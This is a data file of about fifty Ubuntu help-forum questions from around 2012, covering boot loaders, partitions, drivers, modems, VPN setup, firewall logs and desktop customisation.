143303	how do i set up a linux proxy for my mac	as my title suggest , i would like to set up a proxy in linux . the client that i 'm using is a mac osx lion . i think i understand the theory but i keep hitting roadblocks . i started using set proxy server ubuntu linux tutorial here . i already found a spare pc and installed ubuntu 12 on it . according to the article , i have to create an ssh tunnel from how to tunnel traffic with ssh article . in ubuntu , i made sure that i have ssh server so i did a apt-get install ssh . then , it is time to forward ports on my router to individual machine . the individual machine , i assume , is my ubuntu machine which will act as a ssh server . my router is a cisco linksys e3000 . as i try to set up port forwarding , i came across this article . this is where it confuses me : enter your application name . for a list of which ports an application might use , see the sources and citations section below . it seems that i have to know which application and what port they are using to access the internet ? ? ? for example , if i use the terminal in osx , i need to specify 'terminal ' as the application and know what port it uses ? and i need to repeat that for chrome , firefox , app store , diablo 3 , etc ... ? is that the standard way of channeling your internet traffic through a proxy so you can bypass firewall ? how do i set up my proxy such that all my internet connections goes through my ubuntu server and channels it back to my client ( mac osx ) . if anyone is interested , i wanted to do this because as i use heroku for my web app deployment , i keep running into firewalls at my workplace , while traveling , etc ... thanks ! ! !
143307	code vision avr for ubuntu	is there any ways that i can use the code vision avr compiler ? please answer my question i gon na make a robot , so i need a useful compiler for my ubuntu.we are usually work on atmel micro controllers , as you know these micro controllers only program by dap300 programmers & avr compilers . if you have nice answer contact me with my email : ariantalkoo @ gmail.com .thanks !
143312	conky segmentation fault ( core dumped )	i installed the new ubuntu 12.04 and i like it very much , but conky is giving me some problems sometimes it is working normal , and the the next second conky is gone , when i try to restart , i get this : $ conky conky : desktop window ( c00021 ) is subwindow of root window ( 15d ) conky : window type - desktop conky : drawing to created window ( 0x2a00001 ) conky : drawing to double buffer segmentation fault ( core dumped ) does anyone know what i can do about that
143314	how do i change the length of time the lock screen appears for ?	when my screen is locked and i then reawaken it , by moving the mouse or pressing the keyboard , the password entry screen appears . how can i change the amount of time that is taken before the password entry screen turns off ? to be specific : i lock my screen ctrl+alt+t screen goes blank move mouse to bring up login screen if i do nothing else the screen turns off again after 1 minute in my brightness and lock settings i have the screen set to turn off and lock after 10 minutes , but i ca n't see a setting to determine how long it takes for the screen to turn off after the lock screen has been woken . it seems to be set to 1 minute by default , can this be increased/reduced ?
143315	how to hide files and folders in nautilus ?	i want to hide , most of the folders in root ( / ) using nautilus . probably the only folders in / i want shown are /home and /tmp . in addition to hiding folders , i also want to hide two files : initrd.img and initrd.img.old . i find such a setup to be pro-noob , and looks a lot slicker too . how can i hide those folders and files ?
143319	starting android avd fails , saying it ca n't find emulator , but it exists	i 've asked this question both on stackoverflow and the android dev forum , but neither got a single reply as of yet . perhaps a direct focus on ubuntu might get some results . i 've installed the sdk on ubuntu 12.0.4 . i started up the sdk manager and updated several packages . i ran the avd manager and tried to create an avd , but it just failed with no information . i then tried to create the avd from the command line , using the same information i tried to use from the gui , and it worked . when i tried to start that avd , it failed with ( some strings elided ) : failed to start emulator : can not run program `` < myhome > /apps/android/android-sdk-linux/tools/emulator '' : java.io.ioexception : error=2 , no such file or directory this is what i see when i look for this file : $ ls -lt < myhome > /apps/android/android-sdk-linux/tools/emulator -rwxrwxr-x 1 < me > < me > 24828 may 25 08:20 < myhome > /apps/android/android-sdk-linux/tools/emulator* as you can see , the path it 's looking for does exist . what 's going on here ? from one of the responses : $ file ~/apps/android/android-sdk-linux/tools/emulator ~/apps/android/android-sdk-linux/tools/emulator : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.8 , stripped $ $ file /bin/ls /bin/ls : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x214a38d0db472db559f0dabf0ae97f82fea83e03 , stripped $ uname -a linux ... 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_64 x86_64 x86_64 gnu/linux so , it looks like that might be the problem , but i do n't see a 64-bit android sdk distro . am i going to have to give up on the 64-bit ubuntu if i want to use the android sdk on it ?
143323	my computer crashes when i launch supertuxkart	when i launched supertuxkart , the screen when black . now the bootloader is broken . i 've managed to fix it , but i do n't want to try any solutions unless i 'm confident they 'll work . i 'm using the grub2 bootloader that came with ubuntu btw , and also , my pc is a dell inspiron 1525 where the only modification is a 4gb ram set . is there anything i 'm doing wrong ?
143324	where can i see partitions i divided during installation ?	i created two partitions of 500gb hdd and installed ubuntu 12.04 on one of it ... .. where can i find the other partition that is not used ?
143327	how can i succesfully merge the two partitions shown using gparted ?	this is my current partition map : i am currently running gparted in an ubuntu 12.04 live environment . i am having trouble finding out how to merge my unallocated space with /dev/sda2 . i have heard that the partitions must be adjacent to each other to be able to merge , and if so i am 99 % sure that if i reinstall my ubuntu partition ( /dev/sda3 ) to start at the end of the unallocated space rather than the beginning , i will be able to somehow macgyver my way through this , although this is a last resort if even possible at all . i could use any help whatsoever .
143330	how can i customize the ubuntu boot up logo ?	i am making a custom distribution , and have a question about the ubuntu logo with 5 dots displayed when booting up . the ubuntu-logo-script in the /lib/plymouth/themes/ubuntutext folder has the word ubuntu and beneath that 5 progressing 'dots ' . is it possible to remove the progress bar dots , and instead replace it with a faded ubuntu logo , that gradually colors up to full ?
143336	does the files gets deleted from u1 servers when i stop synchronizing	when i removed the sync folder online ( one.ubuntu.com ) , does the files gets deleted from ubuntu servers ?
143341	how to upgrade ubuntu 11.10 to ubuntu 12.04 using wubi iso	i have downloaded , ubuntu 12.04 iso wubi installer iso i believe . i have ubuntu 11.10 . i want to know how to upgrade 11.10 with this wubi ubuntu 12.04 iso . since i got grub , i do n't want to have both linux . is it possible i make wubi iso of 12.04 upgrade from 11.10 using grub way or on ubuntu 11.10 logged in
143342	ubuntu 12.04 wireless hotspot : android stuck on obtaining ip address	i recently upgraded to 12.04 and was delighted to find a simple button to start a wireless hotspot in settings > networks . this is all well and good , however when i try and connect my android device ( samsung galaxy tab rooted with ad-hoc support ) the tablet gets stuck obtaining an ip address . it times out and then tries again to reconnect ad infinitum . i do n't have this problem with windows xp/vista/7 ( tried on all three ) using ad hoc or connectify . i would use my windows 7 starter netbook to create my wireless hotspot , but unfortunately it died a terrible death . why is the android unable to obtain an ip address ? how can i fix this ? any help would be great !
143343	where is my grub ?	where is my grub located ? ? i want to install burg now so i want to know where grub is . this is my partition table.plz help . i tried the boot info script but can not understand anything from its output.. the output is- boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos8 ) /boot/grub on this drive .
143344	installing lubuntu with 512mb ram	i have been trying to install ubuntu on my desktop , with 512mb ram so i downloaded xubuntu . but i could n't install it . i got the same error while downloading and installing lubuntu . i came across md5sums . but i can not actually check my md5sum . i have done a lot of reading , but there was nothing in the layman terms . i can`t run a check on the file . i need help in installing any of the variants of ubuntu compatible on my system .
143346	gtk-warning due to theme tweaking harmful to my stability or not ?	i installed some theme , and enabled them via ubuntu-tweak . when i run nautilus -- check i get this error . is this error harmful to ubuntu/unity/compiz 's stability ? ? ? . ( nautilus:6598 ) : gtk-warning ** : theme parsing error : unity.css:21:19 : not using units is deprecated . assuming 'px ' . ( nautilus:6598 ) : gtk-warning ** : theme parsing error : unity.css:21:21 : not using units is deprecated . assuming 'px ' . ( nautilus:6598 ) : gtk-warning ** : theme parsing error : unity.css:21:25 : not using units is deprecated . assuming 'px ' . ( nautilus:6598 ) : gtk-warning ** : theme parsing error : unity.css:38:26 : not using units is deprecated . assuming 'px ' . ( nautilus:6598 ) : gtk-warning ** : theme parsing error : unity.css:39:27 : not using units is deprecated . assuming 'px ' . ( nautilus:6598 ) : gtk-warning ** : theme parsing error : unity.css:40:17 : 'sahde ' is not a valid color name ( nautilus:6598 ) : gtk-warning ** : theme parsing error : nautilus.css:119:21 : not using units is deprecated . assuming 'px ' .
143347	grub2 efi : where is my efi partition ?	i have installed ubuntu 12.04 on my thinkpad edge ( uefi ) using an usb-stick . i guess it has been botted using efi since a grub menu appeared with the options to boot a live system , install , or check the disk . when i boot my laptop , grub only shows its command line prompt `` grub > '' . after manually running grub-install /dev/sda + update-grub within a chrooted environment it boots grub in recovery mode saying `` file not found . '' the disk is partitioned as follows : /dev/sda1 : ntfs , 1.5gb , system drv /dev/sda2 : ntfs , 150gb , windows7 os /dev/sda3 : extended /dev/sda6 : ext4 , 140gb , ubuntu 12.04 /dev/sda5 : ntfs , 10.7gb , lenovo recovery /dev/sda4 : ntfs , 16.8gb , a custom additional partition i guessed that the partition labelled `` system drv '' may be the efi partition , but then i read that the efi partition is of type fat32 . i do n't have any fat32 partition here ! so i ca n't follow any how-tos explaining how to install grub2 with efi support . they all want me to mount my efi partition at /boot/efi . i also ca n't just create an efi partition since in most how-tos they say that it should be the first partition ( at least it has to be a primary partition ) , but as you see i already have a partition 1 . is n't it possible to just use the normal grub2 tool on efi hardware ? if not , will creating an efi partition solve the problem ? can i use partition 4 for that ? my bootinfo as created by using this article can be found here : http : //paste.ubuntu.com/1011739/ . note that is being made from a ubuntu live usb drive which was at /dev/sdb , so you should ignore this drive . update : as efi does n't seem to be the problem here , i reinstalled ( non-efi- ) grub using boot-repair . new bootinfo can be found here : http : //paste.ubuntu.com/1012223/ . problem is now , that bios does n't boot but gives the error : operating system not found . update 2 ( solution ) : when you read this question when having the same issue ( operating system not found . ) , you might miss the forest for the trees when reading the answers , so i repeat the solution here : the problem in my case was , that i accidently changed the boot flag of the drive to /dev/sda6 , which is a logical partition . bios searches for boot flags on a hard drive it wants to boot from , but only looks in primary partitions . if it ca n't find a boot flag , it skips the hard drive . if it does n't find any drive or media to boot from , you see the error `` operating system not found . ''
143350	how to get a working mtp connection for galaxy s2 in 12.04 ?	any one able to get proper mtp connection setup for galaxy s2 ? ubuntu 12.04 detects my device and automatically mounts it but it 's only partial . the problems are : when i connect my device it immediately shows the above shown error : unable to mount android : error initialising camera : -60 : could not lock the device in nautilus , if i select the device , it takes a very long time ( at least a minute ) before it shows any device content . support is only partial . i can copy and delete but can not read them . photos can be read but if i try to play mp3 it fails . try opening apk file it fails with following dialog : so my question is what settings are to enables to set it up so that that i have 100 % mtp connection . i do n't think i need to setup a new mtp connection as has been described on various blogs to get mtp . because i think ubuntu already detecting it and just needs to tweak a setting or two to give ubuntu full control of my device . if there is no other way other than following those blogs then how do i tell ubuntu to stop automatically mounting my device so that i can setup manually a mtp connection .
143351	ubuntu 12.04 , openvpn with network manager issue	i need to connect to openvpn server from ubuntu 12.04 installation . so , i 've installed network-manager-openvpn package and configure vpn connection . then i try to connect to vpn server , see success message but when i try to do something with network get the `` destination is unreachable '' error , so i ca n't even ping the vpn server . this is the client.conf file i got from server client dev tun proto tcp remote server.com 1194 nobind persist-key persist-tun ca ca.crt cert igor.crt key igor.key comp-lzo verb 3 in network manager settings i set the gateway ( server.com ) , auth type - certificate ( tls ) , set all certificates , enable use lzo data compression option and use tcp connection . so , what may be wrong or where i can find some logs ? i had the same set up with ubuntu 11.10 and it was worked fine , so it 's definitely something missing in my configuration . thanks in advise . upd : when i run openvpn -- config client.con vpn works fine ifconfig when vpn is connected but not working eth0 link encap : ethernet hwaddr f4:6d:04 : e7:05 : c6 inet addr:172.16.24.133 bcast:172.16.24.255 mask:255.255.255.0 inet6 addr : fe80 : :f66d:4ff : fee7:5c6/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4097 errors:0 dropped:0 overruns:0 frame:0 tx packets:3700 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3843712 ( 3.8 mb ) tx bytes:596337 ( 596.3 kb ) interrupt:56 base address:0xc000 tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.8.0.30 p-t-p:10.8.0.29 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:2 errors:0 dropped:0 overruns:0 frame:0 tx packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:294 ( 294.0 b ) tx bytes:11813 ( 11.8 kb )
143358	unable to import digital photos	i am unable to import digital photos in ubuntu 12.04 . when i plug in my camera ( canon eos rebel tii ) it is immediately recognized , but i am unable to download any photos . so far i have tried : using shotwell : shotwell almost immedately hangs after i hit `` import '' , and eventually it crashes . using darktable : darktable hangs when i hit `` import '' . using the ubuntu gui file viewer : the camera is recognized , but any attempt to open the flash drive 's internal folders crashes the file viewer i am certain the camera is working fine because i can easily download photos on a friend 's mac . does anyone have any tips ? i have a lot of wedding photos on my camera right now and people are getting quite anxious to see them .
143366	ca n't install 12.04 to flash using unetbootin.exe	i am trying to install 12.04 to flash using unetbootin.exe . it copies files ok but during the install phase get the following error . un3142.exe has encountered a problem and needs to close . we are sorry for the inconvenience . the number varies but always fails at about 33 % . i have tried loading fedor , same problem .
143368	windows bootloader does n't come up after installing via wubi	i downloaded the ubuntu iso , burned it to a disk and rebooted my computer to run wubi . my first issue was that before the wubi options came up , it said error : prefix not set . i tried the second option ( install ubuntu ) , but that kept giving me a black screen , where nothing was happening , so i manually restarted my computer . i then went into the first option ( try ubuntu without installing ) , and from there chose the install ubuntu program . however , now that it 's installed ( and my c : \ drive has been shrunk ) , the windows bootloader does n't come up to give me the option of booting into ubuntu . any ideas ? also , i 'm running windows 7 , 64 bit . edit : it does n't show ubuntu as being installed in add/remove programs , but my c : \ drive has definitely shrunk . there 's also no c : \ubuntu . i 'm starting to think it did n't get installed or something . is there a way to reclaim the space into my c : \ drive and restart the installation ? edit2 : apparently it created a partition ? here 's what disk manager says : http : //files.droplr.com/files_production/acc_1820/pkhu ? awsaccesskeyid=akiajsvqn3z4k7mt5u2a & expires=1338226683 & signature=jr2w % 2fzc023ucfmqce407evrrfuu % 3d & response-content-disposition=inline % 3b+filename % 3d % 22screenshot+on+5.29.2012+at+1.36.58+am.png % 22
143370	byobu does n't show the colourful status line	i just followed this how to get byobu to launch tmux instead of screen ? and updated byobu on my ubuntu 11.04 64bit notebook . when i was using the old version from ubuntu repos , there always was this colorful status line . with the new version , i no longer see it . i selected tmux as the backend , but the result looks like a bare-bone screen . furthermore , f9 shows only 4 options help toggle status notifications change escape sequence byobu currently does not launch at login ( toggle on ) btw , here is what i have in my $ home/.byobu : zperry @ nb1 : ~/.byobu $ ls -l total 32 -rw-r -- r -- 1 zperry zperry 19 2012-05-27 23:06 backend lrwxrwxrwx 1 zperry zperry 33 2012-05-28 00:08 byobu - > /home/zperry/.local/share/byobu -rw-r -- r -- 1 zperry zperry 38 2012-05-27 23:43 color -rw-r -- r -- 1 zperry zperry 0 2012-05-27 22:59 disable-autolaunch -rw-r -- r -- 1 zperry zperry 43 2012-05-27 23:43 keybindings -rw-r -- r -- 1 zperry zperry 58 2012-05-27 23:05 keybindings.tmux -rw-r -- r -- 1 zperry zperry 40 2012-05-27 23:43 profile -rw-r -- r -- 1 zperry zperry 43 2012-05-27 23:43 profile.tmux -rw-r -- r -- 1 zperry zperry 0 2012-05-27 23:39 reload-required -rw-r -- r -- 1 zperry zperry 1802 2012-05-28 00:08 status -rw-r -- r -- 1 zperry zperry 0 2012-05-27 23:22 status.disable -rw-r -- r -- 1 zperry zperry 1368 2012-05-27 23:43 statusrc -rw-r -- r -- 1 zperry zperry 0 2012-05-27 23:43 windows any hints as to how i can recover the colourful status line , and these missing options ?
143371	what do ufw 's audit log entries mean ?	i 'm sometimes getting a lot of these audit log entries in ... [ ufw audit ] in= out=eth0 src=176.58.105.134 dst=194.238.48.2 len=76 tos=0x10 prec=0x00 ttl=64 id=32137 df proto=udp spt=36231 dpt=123 len=56 [ ufw allow ] in= out=eth0 src=176.58.105.134 dst=194.238.48.2 len=76 tos=0x10 prec=0x00 ttl=64 id=32137 df proto=udp spt=36231 dpt=123 len=56 [ ufw audit ] in= out=lo src=192.168.192.254 dst=192.168.192.254 len=60 tos=0x00 prec=0x00 ttl=64 id=54579 df proto=tcp spt=59488 dpt=30002 window=32792 res=0x00 syn urgp=0 [ ufw audit ] in=lo out= mac=00:00:00:00:00:00:00:00:00:00:00:00:08:00 src=192.168.192.254 dst=192.168.192.254 len=60 tos=0x00 prec=0x00 ttl=64 id=54579 df proto=tcp spt=59488 dpt=30002 window=32792 res=0x00 syn urgp=0 [ ufw audit ] in=lo out= mac=00:00:00:00:00:00:00:00:00:00:00:00:08:00 src=192.168.192.254 dst=192.168.192.254 len=60 tos=0x00 prec=0x00 ttl=64 id=4319 df proto=tcp spt=59489 dpt=30002 window=32792 res=0x00 syn urgp=0 ... what is the meaning of this ? when do they occur and why ? should and can i disable these specific entries ? i do not wish to disable ufw logging , but i 'm not sure whether these lines are useful at all . note that this does not actually occur in /var/log/ufw.log . it only occurs in /var/log/syslog . why is this the case ? more info my logging is set to medium : logging : on ( medium )
143376	how to change xfce4 default window manager	how can i change the default window manager for xfce4 ? for some reason xfwm does n't run when i run xfce4 shell .
143383	dual monitors with one above the other ?	i 'm using gnome 3 and proprietary nvidia drivers . i have tried to set in nvidia-settings my external monitor to be `` above '' my main one ( it 's a laptop ) . however , when i try to drag a window up from the main display to the external one , it gets stuck and ca n't move past a certain point . trying to maximize it changes its decoration so it looks maximized ( i.e . no borders , etc ) , but its size or position does n't change . now , if i set my external monitor to be `` to the left '' of the main one , it works , which is why i 'm suspecting this is a gnome issue , not an nvidia one . anyone know how to fix this ? update : some versions : gnome : 3.2.2.1 nvidia : 280.13 update 2 : i can see that gnome 3.4 is out , and among the release notes is better external monitor support . however , they only mention a small fix that is unrelated to my problem . can anyone with gnome 3.4 and access to an external monitor please test this out and tell me if it works ? i do n't want to go through the hassle of upgrading my ubuntu installation unless i know for certain it 's going to fix the problem .
143387	how to install the ceton infiniti pcie digital cable tuner card ?	can someone give instructions `` for dummies '' on installing the ceton infiniti pcie digital cable tuner card in ubuntu 12.04 ?
143388	can github for windows run on ubuntu with wine ?	i tried the recently launched github for windows app . its pretty cool . i just wanted to try it on ubuntu too . even if it cant do most things its fine , i just want to try it out . but i 'm unable to install the app using wine . it opens the wine browser , and then nothing happens . : ( has anyone done it ? or can anyone tell me how to do it . thanks . if you want more information tell me and i 'll put it here .
143391	12.04 splash screen freeze after upgrades	this is 12.04 lts on an amd a8-3870 apu with radeon ( tm ) hd graphics . had 12.04 installed for a couple of weeks . previously updated ~1 week ago . installed konqueror + available updates on 25/may apparently successfully . on reboot , machine hangs in kde splash screen , before login dialogue . no response to num lock , or other keys . can run recovery mode command prompt & networking . is there a way to find what updates were applied , and roll them back ? is there a way to stop the gui splash screen , and display text startup logging instead ?
143393	shared libsdl library fails to open	i 'm having an issue with a shared library called libsdl . what i 'm trying to do actually is to start up a game engine called gccg ( generic collectible card game ) . all the necessary packages were installed for the engine , however when i run the command ./mtg it gives me the following : ./ccg_client : error while loading shared libraries : libsdl-1.2.so.0 : can not open shared object file : no such file or directory from the error message , it seems clear that the libsdl libraries are either not installed or they can not be accessed/are miss-located . after checking my packages with dpkg -- get-selections | grep libsdl i found out that all the libsdl packages are installed ... so just to make sure , i used sudo apt-get purge on all of the libsdl packages and made a clean install on all of the libsdl packages , however , the result is still the same . furthermore , when i use apt-file search libsdl-1.2.so.0 , to locate the so-called `` missing libraries '' , i get this as a result : libsdl1.2debian : /usr/lib/x86_64-linux-gnu/libsdl-1.2.so.0 libsdl1.2debian : /usr/lib/x86_64-linux-gnu/libsdl-1.2.so.0.11.3 so , as i figure it , they are there ... but they are not shared ?
143394	configure micromax mmx 352g usb 3g modem and aircel in ubuntu server 12.04 to connect to internet	i 'm interested to use ubuntu server 12.04 command line only os to boost my knowledge of linux in depth . i installed it to my dell inspiron 1120 laptop , but i am not able to connect to internet using my micromax mmx 352g usb 3g modem ( i 'm using aircel pocket internet as isp with apn `` aircelweb '' for 2g network ) . i do n't know how to configure my modem to connect to internet . my lsusb output is a follows : odswct @ odswct : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 0bda:0138 realtek semiconductor corp. card reader bus 002 device 003 : id 0bda:58f3 realtek semiconductor corp . bus 001 device 004 : id 1c9e:9605 omega technology odswct @ odswct : ~ $ my modem is detected at last line as `` omega technology '' . is any one there to help me for the configuration in details . it works fine when i am using this modem with ubuntu desktop 12.04 after a modprobe for usbserial . but i want to configure it for ubuntu server 12.04 without using sakis3g script .
143396	no sound in 12.04 on virtualbox	no sound when installed in virtualbox . when i boot from the live cd in windows , sound works fine on my speakers . when in boot the live cd in virtualbox it does not see my speakers . in sound properties only digital output built in s/pdif and headphones ! i 've done the pavcontrol - alsamixer - all settings are ok . i 've tried both 32/64 versions of ubuntu . running current version virtualbox . system : windows 7 64 - i5 . what am i overlooking ?
143404	how do i enable firestarter to run at ubuntu startup	firestarter does not appear to have an option to enable it to run at ubuntu startup . is their a specific setting in ubuntu that i need to edit to enable this ?
143405	i am not able to connect to internet using my micromax mmx 353g usb 3g modem in ubuntu 12.04 lts	i am recently installed ubuntu 12.04 lts in my acer aspire 5542 laptop . i am not able to connect to internet using my micromax mmx 353g usb 3g modem ( i 'm using vodafone mobile as isp with apn `` www '' for 2g network ) . i do n't know how to configure my modem to connect to internet . but i can easily do that using windows 7 . pls kindly help . is there in gui application to do it as i m not well versed with the terminal codes .
143417	are there download limits for ubuntu-one published files ?	i have to share 250 photos in original quality ( 1gb total ) to 40 people . i know that dropbox public links that use up more than 20 gb/day for free accounts and 200 gb/day for paid accounts are automatically suspended . ( dropbox help ) is there a similar limit on ubuntu-one ? i could n't find it in the faq page . will i run into trouble if i publish it in one compressed file on ubuntu-one and 40 people download it in a 48 hours timespan ?
143418	what are blocklists and why are they considered unreliable ?	i 'm new to linux and was just wondering what blocklists are and why they are considered unreliable . example of my problem : will @ will-pc : ~ $ sudo burg-install /dev/sda1 /usr/sbin/burg-setup : warn : attempting to install grub to a partition instead of the mbr . this is a bad idea.. /usr/sbin/burg-setup : warn : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/burg-setup : error : if you really want blocklists , use -- force the problem is : /dev/sda1 is my mbr . any description of blocklists or advice to my problem will be appreciated !
143420	how to install windows 7 on hard disk with virtualbox ?	now i 'm running ubuntu 12.04 , and i have virtualbox , i want to install windows 7 on my other partition , so i can run it from bios either from virtualbox but could i install it to my hdd without running the cd from bios , i mean install it from virtualbox ? all i know when i install it from virtualbox i only can run windows 7 from virtualbox , i ca n't run it alone from bios . if there is a way please help me , i 'm new at ubuntu cause i need to run adobe premiere and fl studio 10 . i know i can install it with windows , but i 'm having problem when i installed fl studio , it 's always stuck at the installation , and i know it will be not maximum to run it from virtualbox
143422	specify parameters for launcher program	i am using ubuntu 12.04 lts . i have google chrome in my launcher and i want to add the parameter -- scroll-pixels=50 when i open it . however , i do n't get any option to set the command line options of the link . any ideas ?
143426	can i forbid a particular application to display pop-up notifications ?	i have installed awn with a weather applet and it annoys me by complaining that it ca n't connect to the internet ( saying `` network error in weather '' ) frequently . despite the fact my internet connection is ok and the applet works just fine actually ( which means it manages to reach the server and update the data as frequently as needed ) . needless to say i do n't really care if it fails to update occasionally . it seems to be using the common ubuntu desktop pop-up system to display its complains . can i block it ? unfortunately i could n't find an option in th applet itself .
143430	sta wireless driver error	i 've got this problem installing my wireless driver . is keeps giving me theis message : check var/log/jockey.log i 've got a gateway computer . but i do n't quite know what wireless driver i need . it tells me : this package contains broadcom 802.11 linux sta wireless driverfor use with broadcom 's bcm4311- , bcm4312- , bcm4313- , bcm4321- , bcm4322- , bcm43224- , and bcm43225- , bcm43227- and bcm43228-basedhardware . but every time i go to try and install it , it gives me that error . how do i fix this ? i 'm running 12.10 .
143433	how to patch libgphoto2 for preview pictures in shotwell while importing ?	under some circumstances , shotwell shows no photo thumbnails while importing . i was trying to download some pictures from my camera ( canon eos 400d ) with shotwell and the program did n't show any preview for the pictures before downloading them ( it just shows a `` forbidden '' snapshot ) . after importing them everything seems fine . i 've found this bug report but no solution is given for now . it seems there could be a solution for eos cameras , according to the last comment . this guy links to a patch , but it 's not downloadable . any ideas of where to obtain a deb package of this patch or of any other solution ?
143435	android device is not recognized in adb	i 'm having a huge problem with my android samsung galaxy tab 7 '' . whenever i try to connect it to my computer , instead of showing normally in my adb devices , the name of the device is : ? ? ? ? ? and it status is online or device . i really do n't know what is the problem , any help would be really appreciated . if you need more info , i would be happy to give it . ubuntu : 11.04 device : samsung galaxy tab 7 '' android version : 3.2 honeycomb i also added the rules in /etc/udev/rules.d/51-android.rules
143437	how to convert unconvertable & unviewable .ts files ?	how to convert . ts files that can not be converted with usual winff , avidemux etc programs ? the . ts files in question are recorded from tv with stv digital cable digibox , viewable to me so far only with that same digibox . all the video-playing programs i tried do not open the files at all ( e.g . classical vlc and winmedia player ) . all but 1 video converters i tried also are not able even to open or load the file into the program , therefore no conversion is possible . according to winff it can not find codec parameters during the conversion , evidently leading to nothing-happening ?
143439	no background/wallpaper in ubuntu 12.04 - what to do ?	this is how my desktop looks like after moving firefox window arround : the background just does n't redraw , there is no wallpaper . it is like that since update to 12.04 - it was the same in 11.10 but i had special intel drivers then that fixed this problem . does n't seem to be fixed in 12.04 even with the ppa i was using then . what can i do ? i could n't find anything about it on google because results were unrelated . : ( i have samsung rf-511 notebook with nvidia card turned off - so it 's using only intel from i7 .
143443	how to reinstall sound ?	i 'm not even sure if sound was working after the install , i have installed things and 'apt-get upgrade ' since then . when i realized i had no sound , i tried installing 'emu10k1 ' from this list : http : //www.alsa-project.org/main/index.php/matrix : vendor-creative_labs but it did n't work , or maybe i made a mistake . i think i should let ubuntu autodetect sound and reinstall it , to see what happens , but how do i do that ? any other info is greatly appreciated . note : i 'm on ubuntu 12 , as host . my sound card is `` soundblaster live ! 5.1 '' note 2 : i 've been using linux for some time but only as vm 's . i 'm moving from windows 7 .
143446	wireless always disabled ( either by ubuntu or hardware switch ) - dell l502x ( 12.04 )	this is the most frustrating bug i 've ever ran into on ubuntu . this was not a problem with 11.10 or even 12.04 betas . when i boot up the wireless is always blocked , whether by a hardware switch ( fn-f2 on my laptop ) or by the option in ubuntu . occasionally i fool around with fn-f2 in different scenarios and i can get it working . however , any time afterwards when i reboot the problem comes back . i 've looked into many of the other answers and tried the solutions ( rfkill , rmmod , etc ) to no avail .
143451	how to extract eclipse into /usr/bin ? and funky compiler errors ?	i ca n't lock eclipse to unity dock or docky because it is saved in my home , i would like to extract the binary to the bin so i can lock it there . the problem is , when i install it from software center or terminal , it just shows up with an error ( ca n't pull it up because it is n't installed ) . also , i get funky compiler errors , it is showing almost every single line has a problem in it . they are compiler errors i have never seen before , i tried using the openjdk 6 , 7 , the oracle jdk 7 , and yet none of them work .
143453	how to make opera open magnet links ?	i have transmission 2.52 and opera 11.64 x64 , when i try to open a magnet link from the pirate bay , opera says it cant recognize that protocol , how to set up ?
143457	cmake module and opengl on 12.04	i 'm trying to find some opengl dev files and i had it working great in 11.10 . i can just barely move around cmake and kind of wrap my head around linux development . if anyone can provide a better explanation of how i can solve this problem after upgrades and what i should look for in the future would be a huge help . here is one of my cmake modules . include ( findpackagehandlestandardargs ) find_package ( pkgconfig $ { gl_find_required } $ { gl_find_quietly } ) if ( pkg_config_found ) set ( pkg_config_path_env_var $ env { pkg_config_path } ) if ( not pkg_config_path_env_var ) if ( gl_find_required ) message ( fatal_error `` environment variable pkg_config_path not set . setting this variable is required in order for pkg-config to locate installed software packages . '' ) endif ( gl_find_required ) endif ( not pkg_config_path_env_var ) pkg_check_modules ( gl gl ) if ( gl_found ) set ( gl_library $ { gl_libraries } ) set ( gl_include_dir $ { gl_includedir } ) set ( gl_library_dir $ { gl_library_dirs } ) if ( not gl_find_quietly ) message ( status `` includedir : $ { gl_include_dir } '' ) message ( status `` librarydir : $ { gl_library_dir } '' ) endif ( not gl_find_quietly ) endif ( gl_found ) endif ( pkg_config_found ) find_package_handle_standard_args ( gl default_msg gl_library gl_include_dir ) i have basically the same file for glu and glui . i am not sure what got screwed up in my dev enviornment , but your help is much appreciated . the error drawglscene ( ) : error : undefined reference to 'glutswapbuffers'
143459	where did `` show_advanced_permissions '' gconf-editor setting go ?	i find the default display of `` permissions '' in nautilus ( when viewing properties of a folder/file ) difficult to use . to solve this , i always used gconf-editor in 10.04 to change to the following : gconf-editor : apps > nautilus > preferences > show_advanced_permissions how can i get permissions to look like above in 12.04 ? the gconf-editor setting is not listed under nautilus in 12.04 . has it been moved ?
143463	ubuntu-12.04-wubi-i386.tar.xz for the wubi installer	i ran the wubi installer ( from an extracted ubuntu iso ) and it downloads ubuntu-12.04-wubi-i386.tar.xz but it 's slow and non-resumable so i cancelled it , found a mirror of the file online and downloaded it using intenet download manager . where should i be placing ubuntu-12.04-wubi-i386.tar.xz file so the wubi installer wo n't have to download that file anymore ? thank you . update : i extracted the archive and there are two files , i 'm afraid i do not know where to place them .
143467	how do i give proper attribution when distributing my modified ambiance theme ?	i made a modified version of 12.04 's ambiance that uses a dark sidebar for nautilus , and i would like to redistribute it via e.g . gnome-look.org . from the launchpad page for the light-themes package , it says the themes are available under a creative commons by-sa 3.0 license . the way i understand it , i can distribute my modified theme so long as i provide proper attribution for it and place it under the same license . in this case , who do i attribute as the author of the original theme and where/how should i display this attribution ?
